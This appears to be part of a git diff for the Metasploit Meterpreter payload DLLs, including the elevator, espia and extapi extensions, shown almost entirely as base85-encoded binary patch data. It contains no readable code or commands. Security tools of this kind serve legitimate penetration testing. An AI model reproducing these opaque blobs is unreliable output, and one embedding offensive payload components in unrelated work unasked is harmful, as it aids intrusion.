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 TTHKuZGfaF{Gk<r|a8LR_9`g^* diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll index 51a59e0838774e3993437d7a2cfa696922349605..fc4b66cef35d657e2b5063056c40c213b0d63fff 100755 GIT binary patch delta 37 rcmZoT!rE|zb;1W`p8FFfe)eVBQPb?ixZR17@sK`9Xgj+h<4*$sFTW1q delta 37 rcmZoT!rE|zb;1Yc`Tsg5e)eTLx4YSiak~>E;~{;J&~|o1#-9cNPVEqi diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll index f8c755ae3147a32abd839c62f4f6bcb3a79d27ee..0c672fe4b50697e6d1522e060857472908cbc72c 100755 GIT binary patch delta 37 rcmZp8!qV`BWx@~UDfcE!{O!wh{!g<P<907bMlTMK(Dvz^jF}n$Q}+-R delta 37 rcmZp8!qV`BWx@~Uz<(VRfBQ07*))4GZueqj^x^;sZJ*A`n5h8(GG`8I diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll index 2595bdaa8ff732a546c1d5196106404fe5a34f59..a48fa5dcd33ad8bb7d6dd17f437dc4113e961af7 100755 GIT binary patch delta 41 vcmZqJ!PBsVXTk?&&HEE3e)eT*nAYsX*zUy0xZR17$>}^uczgQ=rb=%BY2gr> delta 41 vcmZqJ!PBsVXTk^O_5V61e)eUmx!UZ+*zUy0xZR17$>}^uczgQ=rb=%Bh-?xM 
diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll index 939cbb2e0fcfb0691af9f5382e2e5b1f12ce3592..e98f80697db2cca09f804bff11f3b8147da23d9e 100755 GIT binary patch delta 42 wcmZqJ!qc#YX8|MghI<nxGc)=!i7ampVr&m$WZWLa$W-(gB)<Ll6DCVj081zj=>Px# delta 42 ycmZqJ!qc#YX8|K~(!Y+$%#6NF>Cc*j7~6vw8Mg;9G8H{$PW;!g{rD3mOH%+)CJ+t) 
diff --git a/data/meterpreter/ext_server_extapi.x64.dll b/data/meterpreter/ext_server_extapi.x64.dll index 01831d3576e464f2350beda1d01f3b77f0f17cf7..d47966210c972f725836f5dbe773e52f2e94583d 100755 GIT binary patch delta 20230 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 